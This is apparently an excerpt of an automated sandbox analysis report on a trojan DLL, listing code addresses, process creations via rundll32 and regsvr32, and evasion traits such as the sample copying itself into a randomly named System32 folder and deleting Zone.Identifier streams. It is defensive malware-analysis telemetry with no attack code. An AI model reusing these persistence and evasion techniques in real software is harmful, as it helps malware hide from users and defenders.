                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800193004_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB044_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B104_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B284_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F284_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB284_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB304_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800203344_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800107584_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800293684_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800207684_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800173784_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800137804_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800153884_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027904_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A04_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B44_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB44_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C04_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C04_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D84_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E04_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE04_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002BE35A900004_2_000002BE35A90000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_004F00005_2_004F0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010FF45_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028C205_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C0585_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ACA45_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000551C5_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800181485_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E1E05_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C6085_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800216185_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013E285_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AE445_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D26C5_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800252785_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EE985_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800046A85_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001AAB85_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004ACA5_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800132F05_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026B105_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DBE85_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001FC0C5_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000580C5_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800220105_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001481C5_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A42C5_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800118345_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180021C3C5_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000703C5_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000AC485_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC485_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800244585_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064585_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C05C5_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A4605_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800298885_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D49C5_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008CA05_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800248A85_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015CB05_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800124B45_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C4B45_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800288B85_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800024B85_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D8C45_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800250CC5_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800190D45_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017CE45_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800264F05_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800014F85_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020CFC5_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091005_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C9045_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800179085_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800215105_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F9175_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F1285_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD385_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016D3C5_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9445_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D9505_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800131505_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ED505_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E9605_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019D605_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C9645_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C5685_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001D685_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001496C5_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180002D705_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800245745_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800021785_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180024D805_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800185985_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800035985_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F1A45_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A9A85_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119A85_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025DAC5_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DAC5_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800269B05_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800059B85_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800029BC5_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C05_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800125C45_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800121CC5_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BDD05_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800075D45_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800095DC5_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F9E85_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800026105_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800196185_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001FA385_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A2705_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019E785_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DA805_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800246985_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800176B85_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CAD05_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011AD05_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008AD85_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800296EC5_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A6EC5_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800193005_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BB045_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002870C5_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000131C5_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000671C5_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029B285_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012F285_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BB285_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001EB305_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800203345_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800107585_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001435C5_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180009F5C5_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800293685_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800207685_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800173785_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: Ns2al4764F.dllVirustotal: Detection: 35%
                      Source: Ns2al4764F.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\Ns2al4764F.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: classification engineClassification label: mal80.troj.evad.winDLL@27/6@0/3
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,5_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1524:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\svchost.exeAutomated click: OK
                      Source: Ns2al4764F.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: Ns2al4764F.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800253BC pushfd ; retn 0057h2_2_00000001800253BD
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800051D1 push ebp; iretd 5_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004E83 push es; ret 5_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180007B3F push esp; retf 5_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB97BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFFEFB97BE8
                      Source: Ns2al4764F.dllStatic PE information: real checksum: 0x85ab6 should be: 0x8d256
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\GfWDwmUjKsXua\cGZwFaJkDV.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\RpNDUefDG\WguXjQBzdqxftR.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\JfnYivS\pkmSmSGKCcGBpG.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6340Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6384Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6784Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-10063
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,5_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-10065
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr;[
                      Source: svchost.exe, 00000014.00000002.664483911.0000017546A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758083943.0000000000574000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.664475919.0000017546A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.664222835.0000017541229000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405535794.0000021A88EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
